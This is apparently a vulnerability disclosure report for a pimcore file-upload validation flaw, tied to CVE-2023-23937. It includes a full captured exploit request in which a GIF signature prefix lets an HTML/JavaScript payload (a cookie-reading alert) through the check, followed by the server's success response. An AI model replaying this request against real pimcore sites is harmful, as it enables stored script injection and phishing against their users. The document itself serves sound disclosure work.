File Upload Type Validation Error in pimcore/pimcore
Reported on
Jan 17th 2023
Description
The upload functionality for updating user profile does not properly validate the file content-type, allowing any authenticated user to bypass this security check by adding a valid signature (p.e. GIF89) and sending any invalid content-type. This could allow an authenticated attacker to upload HTML files with JS content that will be executed in the context of the domain.
Proof of Concept
The following request was modified to allow uploading HTML file using a valid GIF signature, but can be modified to upload any kind of content-type:
Request
Capture the Request of Updating Profile Picture
POST /admin/user/upload-current-user-image?id=2 HTTP/1.1
Host: demo.pimcore.fun
Cookie: pimcore_admin_sid=1; PHPSESSID=f1a6743af0c4aa2f43eb5a30c312c318; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NzM5MzE3NDQuOTQzMzQzLCJwdGciOnsiX20iOjEsIl9jIjoxNjczOTMxNTYxLCJfdSI6MTY3MzkzMTc0NCwidmk6c3J1IjpbN119LCJleHAiOjE2NzM5MzM1NDR9._aLiOrKEnfyCJ7sjp21XNezGvj93gf9OSpkS82KaSnI; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NzM5MzE3NDQuOTQzNDYyLCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6MX0sIl9jIjoxNjczOTMxNTYxLCJfdSI6MTY3MzkzMTU2MX0sImV4cCI6MTcwNTQ2Nzc0NH0.I1O7KjEqpnL2j7xv8NUruiX3EA50KMiVFShELH1WPsE
Content-Length: 366
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://demo.pimcore.fun
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0BPEuMmR4S3FotDc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: https://demo.pimcore.fun/admin/?_dc=1673931742&perspective=
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundary0BPEuMmR4S3FotDc
Content-Disposition: form-data; name="csrfToken"
2e7d721f1227607982deebcfce21c0c204a272b4
------WebKitFormBoundary0BPEuMmR4S3FotDc
Content-Disposition: form-data; name="Filedata"; filename="111.txt"
Content-Type: text/plain
GIF89<script>alert(document.cookie);</script>
------WebKitFormBoundary0BPEuMmR4S3FotDc--
Response
HTTP/1.1 200 OK
Date: Tue, 17 Jan 2023 05:04:54 GMT
Server: Apache/2.4.38 (Debian)
Strict-Transport-Security: max-age=63072000; preload
X-Powered-By: PHP/8.0.10
Cache-Control: max-age=-1358399094, must-revalidate, private
X-Powered-By: pimcore
Content-Language: en
Pragma: no-cache
Expires: Tue, 01 Jan 1980 00:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f1a6743af0c4aa2f43eb5a30c312c318; path=/; secure; HttpOnly; SameSite=strict
Strict-Transport-Security: max-age=63072000; preload
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Referrer-Policy: origin-when-cross-origin
X-Robots-Tag: noindex, noarchive, nosnippet
Connection: close
Content-Length: 16
{"success":true}
IMAGE
https://drive.google.com/drive/folders/1tX3PCbBFaEK6leGL-QcCvlI2cPJ9qCK2?usp=sharing
Impact
This could allow an attacker to write custom pages, Those pages can contain phising html or even JS code that will be executed in the context of the active user browser.
References
@ctflearner CVE is under https://github.com/pimcore/pimcore/security/advisories/GHSA-8xv4-jj4h-qww6
Thank you again
Thanks for your Response . @JiaJia Ji is it possible that this CVE-2023-23937, reflect into my huntr-dev account by talking to admin ?